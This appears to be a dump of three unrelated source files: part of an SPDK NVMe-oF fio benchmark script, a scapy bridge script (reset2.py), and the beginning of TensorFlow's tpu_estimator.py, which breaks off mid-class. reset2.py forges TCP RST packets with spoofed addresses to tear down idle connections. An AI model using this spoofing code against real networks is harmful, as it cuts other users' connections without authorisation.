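# sections; e.g. 5 devices over 2 threads gives sections with 3 and 2 devices.
# Each section's iodepth is scaled by the number of devices it owns divided by numjobs.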
nvme_list = [os.path.join("/dev", nvme) for nvme in self.get_connected_nvme_list()]
filename_section = ""
nvme_per_split = int(len(nvme_list) / len(threads))
remainder = len(nvme_list) % len(threads)
iterator = iter(nvme_list)
result = []
for i in range(len(threads)):
result.append([])
for _ in range(nvme_per_split):
result[i].append(next(iterator))
if remainder:
result[i].append(next(iterator))
remainder -= 1
for i, r in enumerate(result):
header = "[filename%s]" % i
disks = "\n".join(["filename=%s" % x for x in r])
job_section_qd = round((io_depth * len(r)) / num_jobs)
if job_section_qd == 0:
job_section_qd = 1
iodepth = "iodepth=%s" % job_section_qd
filename_section = "\n".join([filename_section, header, disks, iodepth])
return filename_section
class SPDKInitiator(Initiator):
def __init__(self, name, general_config, initiator_config):
super(SPDKInitiator, self).__init__(name, general_config, initiator_config)
if "skip_spdk_install" not in general_config or general_config["skip_spdk_install"] is False:
self.install_spdk()
# Required fields
self.num_cores = initiator_config["num_cores"]
def install_spdk(self):
self.log_print("Using fio binary %s" % self.fio_bin)
self.exec_cmd(["git", "-C", self.spdk_dir, "submodule", "update", "--init"])
self.exec_cmd(["git", "-C", self.spdk_dir, "clean", "-ffdx"])
self.exec_cmd(["cd", self.spdk_dir, "&&", "./configure", "--with-rdma", "--with-fio=%s" % os.path.dirname(self.fio_bin)])
self.exec_cmd(["make", "-C", self.spdk_dir, "clean"])
self.exec_cmd(["make", "-C", self.spdk_dir, "-j$(($(nproc)*2))"])
self.log_print("SPDK built")
self.exec_cmd(["sudo", "%s/scripts/setup.sh" % self.spdk_dir])
def gen_spdk_bdev_conf(self, remote_subsystem_list):
bdev_cfg_section = {
"subsystems": [
{
"subsystem": "bdev",
"config": []
}
]
}
for i, subsys in enumerate(remote_subsystem_list):
sub_port, sub_nqn, sub_addr = map(lambda x: str(x), subsys)
nvme_ctrl = {
"method": "bdev_nvme_attach_controller",
"params": {
"name": "Nvme{}".format(i),
"trtype": self.transport,
"traddr": sub_addr,
"trsvcid": sub_port,
"subnqn": sub_nqn,
"adrfam": "IPv4"
}
}
if self.enable_adq:
nvme_ctrl["params"].update({"priority": "1"})
bdev_cfg_section["subsystems"][0]["config"].append(nvme_ctrl)
return json.dumps(bdev_cfg_section, indent=2)
def gen_fio_filename_conf(self, subsystems, threads, io_depth, num_jobs=1):
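# Same round-robin split as the kernel initiator, but over SPDK bdev names (NvmeXn1);
# if there are more threads than remote subsystems, the thread count is capped so
# every job section gets at least one bdev.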
filename_section = ""
if len(threads) >= len(subsystems):
threads = range(0, len(subsystems))
filenames = ["Nvme%sn1" % x for x in range(0, len(subsystems))]
nvme_per_split = int(len(subsystems) / len(threads))
remainder = len(subsystems) % len(threads)
iterator = iter(filenames)
result = []
for i in range(len(threads)):
result.append([])
for _ in range(nvme_per_split):
result[i].append(next(iterator))
if remainder:
result[i].append(next(iterator))
remainder -= 1
for i, r in enumerate(result):
header = "[filename%s]" % i
disks = "\n".join(["filename=%s" % x for x in r])
job_section_qd = round((io_depth * len(r)) / num_jobs)
if job_section_qd == 0:
job_section_qd = 1
iodepth = "iodepth=%s" % job_section_qd
filename_section = "\n".join([filename_section, header, disks, iodepth])
return filename_section
if __name__ == "__main__":
script_full_dir = os.path.dirname(os.path.realpath(__file__))
default_config_file_path = os.path.relpath(os.path.join(script_full_dir, "config.json"))
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-c', '--config', type=str, default=default_config_file_path,
help='Configuration file.')
parser.add_argument('-r', '--results', type=str, default='/tmp/results',
help='Results directory.')
parser.add_argument('-s', '--csv-filename', type=str, default='nvmf_results.csv',
help='CSV results filename.')
args = parser.parse_args()
print("Using config file: %s" % args.config)
with open(args.config, "r") as config:
data = json.load(config)
initiators = []
fio_cases = []
general_config = data["general"]
target_config = data["target"]
initiator_configs = [data[x] for x in data.keys() if "initiator" in x]
for k, v in data.items():
if "target" in k:
v.update({"results_dir": args.results})
if data[k]["mode"] == "spdk":
target_obj = SPDKTarget(k, data["general"], v)
elif data[k]["mode"] == "kernel":
target_obj = KernelTarget(k, data["general"], v)
pass
elif "initiator" in k:
if data[k]["mode"] == "spdk":
init_obj = SPDKInitiator(k, data["general"], v)
elif data[k]["mode"] == "kernel":
init_obj = KernelInitiator(k, data["general"], v)
initiators.append(init_obj)
elif "fio" in k:
fio_workloads = itertools.product(data[k]["bs"],
data[k]["qd"],
data[k]["rw"])
fio_run_time = data[k]["run_time"]
fio_ramp_time = data[k]["ramp_time"]
fio_rw_mix_read = data[k]["rwmixread"]
fio_run_num = data[k]["run_num"] if "run_num" in data[k].keys() else None
fio_num_jobs = data[k]["num_jobs"] if "num_jobs" in data[k].keys() else None
fio_rate_iops = 0
if "rate_iops" in data[k]:
fio_rate_iops = data[k]["rate_iops"]
else:
continue
try:
os.mkdir(args.results)
except FileExistsError:
pass
target_obj.tgt_start()
for i in initiators:
i.discover_subsystems(i.target_nic_ips, target_obj.subsys_no)
if i.enable_adq:
i.adq_configure_tc()
# Poor man's threading
# Run FIO tests
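# Each initiator runs its FIO job in its own thread, and the optional SAR/PCM/
# bandwidth/DPDK measurements run in their own threads on the target; all threads
# are started together and joined before results are collected.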
for block_size, io_depth, rw in fio_workloads:
threads = []
configs = []
for i in initiators:
if i.mode == "kernel":
i.kernel_init_connect()
cfg = i.gen_fio_config(rw, fio_rw_mix_read, block_size, io_depth, target_obj.subsys_no,
fio_num_jobs, fio_ramp_time, fio_run_time, fio_rate_iops)
configs.append(cfg)
for i, cfg in zip(initiators, configs):
t = threading.Thread(target=i.run_fio, args=(cfg, fio_run_num))
threads.append(t)
if target_obj.enable_sar:
sar_file_name = "_".join([str(block_size), str(rw), str(io_depth), "sar"])
sar_file_name = ".".join([sar_file_name, "txt"])
t = threading.Thread(target=target_obj.measure_sar, args=(args.results, sar_file_name))
threads.append(t)
if target_obj.enable_pcm:
pcm_fnames = ["%s_%s_%s_%s.csv" % (block_size, rw, io_depth, x) for x in ["pcm_cpu", "pcm_memory", "pcm_power"]]
pcm_cpu_t = threading.Thread(target=target_obj.measure_pcm, args=(args.results, pcm_fnames[0],))
pcm_mem_t = threading.Thread(target=target_obj.measure_pcm_memory, args=(args.results, pcm_fnames[1],))
pcm_pow_t = threading.Thread(target=target_obj.measure_pcm_power, args=(args.results, pcm_fnames[2],))
threads.append(pcm_cpu_t)
threads.append(pcm_mem_t)
threads.append(pcm_pow_t)
if target_obj.enable_bandwidth:
bandwidth_file_name = "_".join(["bandwidth", str(block_size), str(rw), str(io_depth)])
bandwidth_file_name = ".".join([bandwidth_file_name, "csv"])
t = threading.Thread(target=target_obj.measure_network_bandwidth, args=(args.results, bandwidth_file_name,))
threads.append(t)
if target_obj.enable_dpdk_memory:
t = threading.Thread(target=target_obj.measure_dpdk_memory, args=(args.results,))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
for i in initiators:
if i.mode == "kernel":
i.kernel_init_disconnect()
i.copy_result_files(args.results)
target_obj.restore_governor()
target_obj.restore_tuned()
target_obj.restore_services()
target_obj.restore_sysctl()
for i in initiators:
i.restore_governor()
i.restore_tuned()
i.restore_services()
i.restore_sysctl()
target_obj.parse_results(args.results, args.csv_filename)
|
reset2.py
|
#!/usr/bin/env python
from scapy.all import *
import argparse
import time
import threading
timer1=0.0
timer2=0.0
timer1_set=False
timer2_set=False
tcpData1={}
tcpData2={}
def watchdog():
global timer1_set
global timer2_set
global timer1
global timer2
global tcpData1
global tcpData2
print("Thread started")
#while timer1_set:
while True:
# Sleep briefly so the watchdog does not spin at 100% CPU
time.sleep(1)
print("checking time")
# Only act once at least one TCP segment has been observed, otherwise tcpData1 is empty
if timer1_set and (time.time()-timer1)>10:
# send RST
print("sending RST")
p=IP(src=tcpData1['dst'], dst=tcpData1['src'])/TCP(sport=tcpData1['dport'], dport=tcpData1['sport'], flags="R", seq=tcpData1['ack'])
send(p, iface=args.in_interface)
'''
while timer2_set:
if (time.time()-timer2)>10:
# send RST
print("sending RST")
p=IP(src=tcpData2['dst'], dst=tcpData2['src'])/TCP(sport=tcpData2['dport'], dport=tcpData2['sport'], flags="R", seq=tcpData2['ack'])
send(p, iface=args.out_interface)
'''
def packet_callback(packet):
'''
Return True and the packet is forwarded, return False and the packet is
dropped, return a packet and that packet is forwarded instead.
'''
# Forward every packet unchanged.
return True
def packet_callback12(packet):
global timer1_set
timer1_set=True
global tcpData1
if packet.haslayer(TCP):
tcpData1={'src':packet[IP].src,'dst':packet[IP].dst,'sport':packet[TCP].sport,
'dport':packet[TCP].dport,'seq':packet[TCP].seq,'ack':packet[TCP].ack}
global timer1
timer1=time.time()
print("Timer 1 = "+ str(timer1))
return True
def packet_callback21(packet):
global timer2_set
timer2_set=True
global tcpData2
if packet.haslayer(TCP):
tcpData2={'src':packet[IP].src,'dst':packet[IP].dst,'sport':packet[TCP].sport,
'dport':packet[TCP].dport,'seq':packet[TCP].seq,'ack':packet[TCP].ack}
global timer2
timer2=time.time()
print("Timer2: "+str(timer2))
return True
def main():
# args is read by the watchdog() thread, so keep it module-global
global args
parser=argparse.ArgumentParser()
parser.add_argument('--in_interface', '-i', required=True, type=str)
parser.add_argument('--out_interface', '-o', required=True, type=str)
args=parser.parse_args()
t=threading.Thread(target=watchdog)
t.start()
while True:
#bridge_and_sniff(args.in_interface, args.out_interface, prn=packet_callback)
bridge_and_sniff(args.in_interface, args.out_interface, xfrm12=packet_callback12, xfrm21=packet_callback21)
if __name__=='__main__':
main()
|
tpu_estimator.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===================================================================
"""TPUEstimator class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import enum
import math
import os
import signal
import sys
import threading
import time
import tensorflow as tf
import numpy as np
import six
from six.moves import queue as Queue # pylint: disable=redefined-builtin
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.framework import variable_pb2
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf.tpu import compilation_result_pb2 as tpu_compilation_result
from tensorflow.python.client import session as tf_session
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.util import nest as data_nest
from tensorflow.python.distribute.cluster_resolver import tpu_cluster_resolver
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import batch_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import summary_ops_v2 as contrib_summary
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import tag_constants
from tensorflow.python.summary import summary
from tensorflow.python.tpu import functional as tpu_functional
from tensorflow.python.tpu import preempted_hook
from tensorflow.python.tpu import session_support
from tensorflow.python.tpu import tensor_tracer
from tensorflow.python.tpu import tpu
from tensorflow.python.tpu import tpu_embedding_gradient
from tensorflow.python.tpu import tpu_feed
from tensorflow.python.tpu import tpu_function
from tensorflow.python.tpu import training_loop
from tensorflow.python.tpu.ops import tpu_ops
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import evaluation
from tensorflow.python.training import session_run_hook
from tensorflow.python.training import training
from tensorflow.python.training import training_util
from tensorflow.python.util import function_utils
from tensorflow.python.util import nest
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import estimator_export
from tensorflow_estimator.python.estimator import estimator as estimator_lib
from tensorflow_estimator.python.estimator import model_fn as model_fn_lib
from tensorflow_estimator.python.estimator.export import export_output as export_output_lib
from tensorflow_estimator.python.estimator.tpu import _tpu_estimator_embedding
from tensorflow_estimator.python.estimator.tpu import error_handling
from tensorflow_estimator.python.estimator.tpu import iteration_count_estimator
from tensorflow_estimator.python.estimator.tpu import tpu_config
from tensorflow_estimator.python.estimator.tpu import tpu_context
from tensorflow_estimator.python.estimator.tpu import util as util_lib
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import AdagradParameters # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import AdamParameters # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import EmbeddingConfigSpec # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import StochasticGradientDescentParameters # pylint: disable=unused-import
_INITIAL_LOSS = 1e7
_ZERO_LOSS = 0.
_TPU_ESTIMATOR = 'tpu_estimator'
_ITERATIONS_PER_LOOP_VAR = 'iterations_per_loop'
_BATCH_SIZE_KEY = 'batch_size'
_CTX_KEY = 'context'
_USE_TPU_KEY = 'use_tpu'
_CROSS_REPLICA_SUM_OP = 'CrossReplicaSum'
_ONE_GIGABYTE = 1024 * 1024 * 1024
_TPU_ENQUEUE_OPS = '_tpu_enqueue_ops'
_TPU_TRAIN_OP = '_tpu_train_op'
_INFERENCE_ON_TPU_MODE = '_inference_on_tpu'
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR = '_key_when_predictions_is_a_tensor'
_TENSOR_PACKER_SMALL_FEATURE_DIM_SIZE = 1
_TENSOR_PACKER_MINIMUM_NUM_SMALL_FEATURES_TO_GROUP = 5
_TENSOR_PACKER_CONCATENATED_SMALL_FEATURES_KEY = '_concatenated_small_features'
# Ideally _USE_TPU_KEY should be reserved as well. However there are already
# models that make use of this key, thus it can not be reserved now to prevent
# breakage. In the long run, we would like to mitigate this by migrating models
# off of using _USE_TPU_KEY.
_RESERVED_PARAMS_KEYS = [_BATCH_SIZE_KEY, _CTX_KEY]
# TODO(b/65703635): Flip the value and remove all dead code. Currently, this is
# only used for per-core based deployments. For per-host based pipelines, if a
# user returns a Dataset instance it will be automatically wrapped in a
# tf.while_loop (This can be disabled by returning features and labels
# explicitly).
_WRAP_INPUT_FN_INTO_WHILE_LOOP = False
if ops.get_to_proto_function(
'{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)) is None:
ops.register_proto_function(
'{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR),
proto_type=variable_pb2.VariableDef,
to_proto=resource_variable_ops._to_proto_fn, # pylint: disable=protected-access
from_proto=resource_variable_ops._from_proto_fn) # pylint: disable=protected-access
def _is_iterable(obj):
"""A Python 2 and 3 compatible util to check whether `obj` is iterable."""
try:
iter(obj)
return True
except TypeError:
return False
class CatchInvalidHostcallFunctions(control_flow_ops.XLAControlFlowContext):
def AddOp(self, op):
if op.type in [
'AudioSummary', 'AudioSummaryV2', 'HistogramSummary', 'ImageSummary',
'MergeSummary', 'ScalarSummary', 'TensorSummary', 'TensorSummaryV2'
]:
raise ValueError('Please use tf.contrib.summary instead of tf.summary '
'inside of host_calls.')
def _create_global_step(graph):
graph = graph or tf.compat.v1.get_default_graph()
if tf.compat.v1.train.get_global_step(graph) is not None:
raise ValueError('"global_step" already exists.')
# Create in proper graph and base name_scope.
with graph.as_default() as g, g.name_scope(None):
return tf.compat.v1.get_variable(
tf.compat.v1.GraphKeys.GLOBAL_STEP,
shape=[],
dtype=tf.dtypes.int64,
initializer=tf.compat.v1.initializers.zeros(),
trainable=False,
use_resource=True,
collections=[tf.compat.v1.GraphKeys.GLOBAL_VARIABLES, tf.compat.v1.GraphKeys.GLOBAL_STEP])
def _create_or_get_iterations_per_loop():
"""Creates or gets the iterations_per_loop variable.
In TPUEstimator, the user provided computation, the model_fn, is wrapped
inside a tf.while_loop for peak performance. The iterations of the loop are
specified by this variable, which adjusts its value on the CPU after each TPU
program execution and before the next TPU execution.
The purpose of using a variable, rather than a constant, is to allow
TPUEstimator to adapt the TPU training iterations according to the final steps
specified by users. For example, if the user sets the iterations_per_loop as 4
in TPUConfig and steps as 10 in TPUEstimator.train(), the iterations_per_loop
variable will have the following value before each TPU training.
- 1st TPU execution: iterations_per_loop = 4
- 2nd TPU execution: iterations_per_loop = 4
- 3rd TPU execution: iterations_per_loop = 2
As model_fn increases the global step once per train_op invocation, the global
step is 10 after all TPU executions, matching the steps=10 inputs passed in by
users.
Returns:
A TF non-trainable resource variable.
Raises:
RuntimeError: If multiple iterations_per_loop variables were found.
"""
graph = tf.compat.v1.get_default_graph()
collection_name = '{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)
iter_vars = graph.get_collection(collection_name)
if len(iter_vars) == 1:
return iter_vars[0]
elif len(iter_vars) > 1:
raise RuntimeError('Multiple iterations_per_loop_var in collection.')
with ops.colocate_with(tf.compat.v1.train.get_global_step()):
with tf.compat.v1.variable_scope(
_TPU_ESTIMATOR, reuse=tf.compat.v1.AUTO_REUSE):
return tf.compat.v1.get_variable(
_ITERATIONS_PER_LOOP_VAR,
initializer=tf.compat.v1.initializers.zeros(),
shape=[],
dtype=tf.dtypes.int32,
trainable=False,
collections=[collection_name, tf.compat.v1.GraphKeys.LOCAL_VARIABLES],
use_resource=True)
def _sync_variables_ops(ctx):
"""Create varriables synchronization ops.
Gets the variables back from TPU nodes. This means the variables updated
by TPU will now be *synced* to host memory.
In BROADCAST mode, we skip this sync since the variables are usually too
big to transmit via RPC.
Args:
ctx: A `_InternalTPUContext` instance with mode.
Returns:
A list of sync ops.
"""
if not ctx.is_input_broadcast_with_iterators():
return [
tf.debugging.check_numerics(v.read_value(),
'Gradient for %s is NaN' % v.name).op
for v in tf.compat.v1.trainable_variables()
]
else:
return [tf.no_op()]
def _increase_eval_step_op(iterations_per_loop):
"""Returns an op to increase the eval step for TPU evaluation.
Args:
iterations_per_loop: Tensor. The number of eval steps running in TPU system
before returning to CPU host for each `Session.run`.
Returns:
An operation
"""
eval_step = evaluation._get_or_create_eval_step() # pylint: disable=protected-access
# Estimator evaluate increases 1 by default. So, we increase the difference.
return tf.compat.v1.assign_add(
eval_step,
tf.cast(iterations_per_loop - 1, dtype=eval_step.dtype),
use_locking=True)
def _extract_key_names(tensor_or_dict):
if isinstance(tensor_or_dict, dict):
return sorted(tensor_or_dict.keys())
return []
class PeriodicLogger(object):
def __init__(self, seconds):
self._log_every_n_seconds = seconds
self._last_log_time = 0
def log(self, msg, *args, **kw):
if time.time() - self._last_log_time > self._log_every_n_seconds:
self._last_log_time = time.time()
tf.compat.v1.logging.info(msg, *args, **kw)
class _SIGNAL(object):
"""Signal used to control the thread of infeed/outfeed.
All reserved signals must be negative numbers. Positive numbers are used to
indicate the number of iterations for next training/evaluation loop.
"""
NEXT_BATCH = -1
STOP = -2
@estimator_export(v1=['estimator.tpu.TPUEstimatorSpec'])
class TPUEstimatorSpec(model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
"""Ops and objects returned from a `model_fn` and passed to `TPUEstimator`.
See `EstimatorSpec` for `mode`, `predictions`, `loss`, `train_op`, and
`export_outputs`.
For evaluation, `eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`metric_fn` runs on CPU to generate metrics and `tensors` represents the
`Tensor`s transferred from TPU system to CPU host and passed to `metric_fn`.
To be precise, TPU evaluation expects a slightly different signature from the
`tf.estimator.Estimator`. While `EstimatorSpec.eval_metric_ops` expects a
dict, `TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`.
The `tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. The
`tensors` usually specify the model logits, which are transferred back from
TPU system to CPU host. All tensors must be batch-major, i.e., the batch
size is the first dimension. Once all tensors are available at CPU host from
all shards, they are concatenated (on CPU) and passed as positional arguments
to the `metric_fn` if `tensors` is list or keyword arguments if `tensors` is
a dict. `metric_fn` takes the `tensors` and returns a dict from metric string
name to the result of calling a metric function, namely a `(metric_tensor,
update_op)` tuple. See `TPUEstimator` for MNIST example how to specify the
`eval_metrics`.
`scaffold_fn` is a function running on CPU to generate the `Scaffold`. This
function should not capture any Tensors in `model_fn`.
`host_call` is a tuple of a `function` and a list or dictionary of `tensors`
to pass to that function and returns a list of Tensors. `host_call` currently
works for train() and evaluate(). The Tensors returned by the function are
executed on the CPU on every step, so there is communication overhead when
sending tensors from TPU to CPU. To reduce the overhead, try reducing the
size of the tensors. The `tensors` are concatenated along their major (batch)
dimension, and so must be >= rank 1. The `host_call` is useful for writing
summaries with `tf.contrib.summary.create_file_writer`.
"""
def __new__(cls,
mode,
predictions=None,
loss=None,
train_op=None,
eval_metrics=None,
export_outputs=None,
scaffold_fn=None,
host_call=None,
training_hooks=None,
evaluation_hooks=None,
prediction_hooks=None):
"""Creates a validated `TPUEstimatorSpec` instance."""
cls._host_calls = {}
if eval_metrics is not None:
cls._host_calls['eval_metrics'] = eval_metrics
if host_call is not None:
cls._host_calls['host_call'] = host_call
_OutfeedHostCall.validate(cls._host_calls)
training_hooks = tuple(training_hooks or [])
evaluation_hooks = tuple(evaluation_hooks or [])
prediction_hooks = tuple(prediction_hooks or [])
for hook in training_hooks + evaluation_hooks + prediction_hooks:
if not isinstance(hook, tf.compat.v1.train.SessionRunHook):
raise TypeError('All hooks must be SessionRunHook instances, given: {}'
.format(hook))
return super(TPUEstimatorSpec, cls).__new__(
cls,
mode=mode,
predictions=predictions,
loss=loss,
train_op=train_op,
eval_metrics=eval_metrics,
export_outputs=export_outputs,
scaffold_fn=scaffold_fn,
host_call=host_call,
training_hooks=training_hooks,
evaluation_hooks=evaluation_hooks,
prediction_hooks=prediction_hooks)
def as_estimator_spec(self):
"""Creates an equivalent `EstimatorSpec` used by CPU train/eval."""
host_call_ret = _OutfeedHostCall.create_cpu_hostcall(self._host_calls)
eval_metric_ops = None
if self.eval_metrics is not None:
eval_metric_ops = host_call_ret['eval_metrics']
hooks = None
if self.host_call is not None:
hooks = [_OutfeedHostCallHook(host_call_ret['host_call'])]
loss = self.loss
if tensor_tracer.TensorTracer.is_enabled() \
and self.train_op is not None:
tt = tensor_tracer.TensorTracer()
loss = tt.trace_cpu(tf.compat.v1.get_default_graph(), loss, self.train_op)
hooks = tuple(hooks or [])
scaffold = self.scaffold_fn() if self.scaffold_fn else None
return model_fn_lib.EstimatorSpec(
mode=self.mode,
predictions=self.predictions,
loss=loss,
train_op=self.train_op,
eval_metric_ops=eval_metric_ops,
export_outputs=self.export_outputs,
scaffold=scaffold,
training_hooks=self.training_hooks + hooks,
evaluation_hooks=self.evaluation_hooks + hooks,
prediction_hooks=self.prediction_hooks + hooks)
class _OpQueueContext(object):
"""Manages work queue and thread for a infeed/outfeed thread."""
def __init__(self, name, target, args):
self._name = name
self._queue = Queue.Queue()
args = (self,) + args
self._thread = threading.Thread(name=name, target=target, args=args)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._queue.put(_SIGNAL.STOP)
def send_next_batch_signal(self, iterations):
self._queue.put(iterations)
def read_iteration_counts(self):
while True:
iterations = self._queue.get(block=True)
tf.compat.v1.logging.debug('%s read iterations %s', self._name, iterations)
if iterations == _SIGNAL.STOP:
tf.compat.v1.logging.info('%s received shutdown signal, stopping.', self._name)
return
yield iterations
def join(self):
tf.compat.v1.logging.info('Shutting down %s thread.', self._name)
self.stop()
self._thread.join()
class _OpSignalOnceQueueContext(_OpQueueContext):
"""Manages work queue and thread for a infeed/outfeed thread.
This subclass only signals once.
"""
def __init__(self, name, target, args):
super(_OpSignalOnceQueueContext, self).__init__(name, target, args)
self._has_signaled = False
def send_next_batch_signal(self, iterations):
if not self._has_signaled:
self._queue.put(iterations)
self._has_signaled = True
class TPUInfeedOutfeedSessionHook(tf.compat.v1.train.SessionRunHook):
"""A Session hook setting up the TPU initialization, infeed, and outfeed.
This hook does two major things:
1. initialize and shutdown TPU system.
2. launch and join the threads for infeed enqueue and (optional) outfeed
dequeue.
"""
def __init__(self,
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op,
run_infeed_loop_on_coordinator=True,
rendezvous=None,
master=None,
session_config=None,
tpu_init_ops=None,
outfeed_every_n_steps=1):
self._master_job = ctx.master_job
self._enqueue_ops = enqueue_ops
self._dequeue_ops = dequeue_ops
self._rendezvous = rendezvous
self._master = master
self._session_config = session_config
self._init_ops = list(tpu_init_ops or [])
if ctx.embedding_config is None:
self._embedding_layer_config = None
else:
self._embedding_layer_config = (
ctx.embedding_config.tpu_embedding.config_proto)
self._run_infeed_loop_on_coordinator = run_infeed_loop_on_coordinator
self._initial_infeed_sleep_secs = (
ctx.config.tpu_config.initial_infeed_sleep_secs)
self._tpu_compile_op = tpu_compile_op
# When using model parallelism, the TPU is pre-initialized at startup to
# fetch mesh information. We skip re-initializing it here for
# MeshTensorFlow since it places variables on TPU directly. Reinitializing
# the TPU would corrupt those variables, since the previously allocated memory
# might be overwritten for other purposes.
if (ctx.model_parallelism_enabled and
(ctx.config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.BROADCAST)):
self._should_initialize_tpu = False
else:
self._should_initialize_tpu = True
self._outfeed_every_n_steps = outfeed_every_n_steps
def begin(self):
tf.compat.v1.logging.info('TPU job name %s', self._master_job)
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
if self._should_initialize_tpu:
self._finalize_ops = [tf.compat.v1.tpu.shutdown_system(job=self._master_job)]
else:
self._finalize_ops = []
summary_writer_init_ops = contrib_summary.summary_writer_initializer_op()
self._init_ops.extend(summary_writer_init_ops)
# Get all the writer resources from the initializer, so we know what to
# flush.
for op in summary_writer_init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def _run_infeed(self, queue_ctx, session):
tf.compat.v1.logging.info('Starting infeed thread controller.')
if self._initial_infeed_sleep_secs:
tf.compat.v1.logging.info('Infeed thread sleeping for %d seconds.',
self._initial_infeed_sleep_secs)
time.sleep(self._initial_infeed_sleep_secs)
tf.compat.v1.logging.info('Infeed thread starting after sleep')
with self._rendezvous.catch_errors(source='infeed', session=session):
if self._run_infeed_loop_on_coordinator:
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
tf.compat.v1.logging.debug('Infeed enqueue for iteration (%d, %d)', count, i)
session.run(self._enqueue_ops)
else:
for _ in queue_ctx.read_iteration_counts():
session.run(self._enqueue_ops)
tf.compat.v1.logging.info('Infeed thread finished, shutting down.')
def _run_outfeed(self, queue_ctx, session):
tf.compat.v1.logging.info('Starting outfeed thread controller.')
status_logger = PeriodicLogger(seconds=60)
with self._rendezvous.catch_errors(source='outfeed', session=session):
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
step_counter = 0
for i in xrange(steps):
tf.compat.v1.logging.debug('Outfeed dequeue for iteration (%d, %d)', count, i)
if step_counter % self._outfeed_every_n_steps == 0:
session.run(self._dequeue_ops)
step_counter += 1
status_logger.log('Outfeed finished for iteration (%d, %d)', count, i)
tf.compat.v1.logging.info('Outfeed thread finished, shutting down.')
def _create_infeed_controller(self, name, target, args):
return _OpQueueContext(name=name, target=target, args=args)
def _assertCompilationSucceeded(self, result, coord):
proto = tpu_compilation_result.CompilationResultProto()
proto.ParseFromString(result)
if proto.status_error_message:
tf.compat.v1.logging.error('Compilation failed: {}'.format(proto.status_error_message))
coord.request_stop()
else:
tf.compat.v1.logging.info('Compilation succeeded')
def after_create_session(self, session, coord):
if self._should_initialize_tpu:
tf.compat.v1.logging.info('Init TPU system')
start = time.time()
with tf.Graph().as_default():
with tf.compat.v1.Session(
self._master, config=self._session_config) as sess:
sess.run(
tf.compat.v1.tpu.initialize_system(
job=self._master_job,
embedding_config=self._embedding_layer_config))
tf.compat.v1.logging.info('Initialized TPU in %d seconds', time.time() - start)
session.run(self._init_ops,
options=config_pb2.RunOptions(timeout_in_ms=5 * 60 * 1000))
if os.environ.get('TPU_SPLIT_COMPILE_AND_EXECUTE', '') == '1':
tf.compat.v1.logging.info('Compiling user program: this may take a while...')
self._assertCompilationSucceeded(session.run(self._tpu_compile_op), coord)
self._infeed_controller = self._create_infeed_controller(
name='InfeedController', target=self._run_infeed, args=(session,))
self._outfeed_controller = _OpQueueContext(
name='OutfeedController', target=self._run_outfeed, args=(session,))
# Enable the worker watchdog to terminate workers on coordinator exit.
watchdog_timeout = int(os.environ.get('TF_TPU_WATCHDOG_TIMEOUT', '0'))
if watchdog_timeout > 0:
session_support.start_worker_watchdog(session,
shutdown_timeout=watchdog_timeout)
def before_run(self, run_context):
iterations = run_context.session.run(self._iterations_per_loop_var)
tf.compat.v1.logging.info('Enqueue next (%d) batch(es) of data to infeed.', iterations)
self._infeed_controller.send_next_batch_signal(iterations)
tf.compat.v1.logging.info('Dequeue next (%d) batch(es) of data from outfeed.',
iterations)
self._outfeed_controller.send_next_batch_signal(iterations)
def end(self, session):
tf.compat.v1.logging.info('Stop infeed thread controller')
self._infeed_controller.join()
self._rendezvous.record_done('infeed')
tf.compat.v1.logging.info('Stop output thread controller')
self._outfeed_controller.join()
self._rendezvous.record_done('outfeed')
tf.compat.v1.logging.info('Shutdown TPU system.')
session.run(self._finalize_ops)
class TPUInfeedOutfeedSessionHookForPrediction(TPUInfeedOutfeedSessionHook):
def __init__(self, ctx, enqueue_ops, dequeue_ops, tpu_compile_op,
rendezvous=None, master=None, session_config=None):
